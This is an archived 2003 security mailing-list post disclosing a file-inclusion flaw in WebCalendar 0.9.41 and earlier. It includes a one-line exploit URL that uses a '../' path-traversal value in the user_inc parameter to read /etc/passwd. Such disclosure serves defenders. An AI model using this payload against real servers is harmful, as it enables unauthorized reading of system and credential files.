WebCalendar Include File

From: noconflic (nocon@texas-shooters.com)
Date: Sun Jul 20 2003 - 18:20:15 PDT

Next message: Michael Howard: "ActiveX security resources"

Previous message: Donahue, Pat: "RE: Cisco IOS exploit (44020)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Webcalendar 0.9.41 and below.
http://webcalendar.sourceforge.net/

  Since this appears to be public info now. 

Problem: 
  http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

Exploit:
  http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd   


- nocon
http://nocon.darkflame.net/

Next message: Michael Howard: "ActiveX security resources"
Previous message: Donahue, Pat: "RE: Cisco IOS exploit (44020)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 21 2003 - 10:36:09 PDT